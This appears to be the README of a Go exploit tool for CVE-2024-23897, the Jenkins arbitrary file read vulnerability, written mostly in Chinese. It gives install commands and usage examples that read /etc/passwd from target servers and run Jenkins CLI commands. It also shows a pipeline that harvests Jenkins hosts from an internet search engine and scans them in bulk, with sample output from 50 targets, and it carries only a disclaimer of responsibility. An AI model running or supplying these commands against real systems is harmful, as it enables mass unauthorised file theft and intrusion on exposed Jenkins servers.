CVE-2024-23897 - Jenkins 任意文件读取利用工具

安装

CVE-2024-23897 需要go 1.21才能完成安装执行以下命令

go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest

或者安装完成的二进制文件在release中下载

使用

CVE-2024-23897 -help

CVE-2024-23897 is a tool for scanning for CVE-2024-23897

Usage:
  CVE-2024-23897 [flags]

Flags:
INPUT:
   -url, -u string[]  URL to scan. (e.g. -u https://example.com)
   -list string[]     File containing list of URLs to scan. (e.g. -list list.txt)

CONFIG:
   -c, -command string[]           JinKens Command to run. (e.g. -c 'who-am-i')
   -a, -args string[]              JinKens Command args.
   -e, -exec                       JinKens Execute command.
   -lac, -list-available-commands  List available commands.

OUTPUT:
   -no-color  Don't Use colors in output

DEBUG:
   -debug                           Enable debugging
   -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
   -irt, -input-read-timeout value  timeout on input read (default 3m0s)
   -version                         show version of CVE-2024-23897 tool
   -no-stdin                        disable stdin processing

LIMIT:
   -timeout int          time to wait in seconds before timeout (default 10)
   -t, -thread int       Number of concurrent threads (default 30)
   -rl, -rate-limit int  Rate limit for enumeration speed (n req/sec) (default -1)

UPDATE:
   -update                      Update tool
   -duc, -disable-update-check  Disable update check

Examples:
Run CVE-2024-23897 check vulnerability on a single targets
        $ CVE-2024-23897 -url https://example.com

Run CVE-2024-23897 check vulnerability on list of targets
        $ CVE-2024-23897 -list list.txt

Run CVE-2024-23897 read full file contents on a single targets
        $ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd

Run CVE-2024-23897 read available commands on a single targets
        $ CVE-2024-23897 -url https://example.com -lac

Run CVE-2024-23897 execute the JenKings command
        $ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec

Run CVE-2024-23897 check vulnerability on a single targets by proxy server
        $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890

Run CVE-2024-23897 on uncovering Jenkins check vulnerability
        $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

use pathScan to collect targets and pass them to CVE-2024-23897 via standard input

pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

To protect your privacy, I have deleted some outputs

➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

   _______    ________    ___  ____ ___  __ __       ___  _____ ____  ____ _____
  / ____| |  / / ____/   |__ \/ __ |__ \/ // /      |__ \|__  /( __ )/ __ /__  /
 / /    | | / / __/________/ / / / __/ / // /_________/ / /_ </ __  / /_/ / / /
/ /___  | |/ / /__/_____/ __/ /_/ / __/__  __/_____/ __/___/ / /_/ /\__, / / /
\____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/

Jenkins 任意文件读取漏洞
                        wjlin0.com

慎用。你要为自己的行为负责
开发者不承担任何责任，也不对任何误用或损坏负责.

[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd

[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body 
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests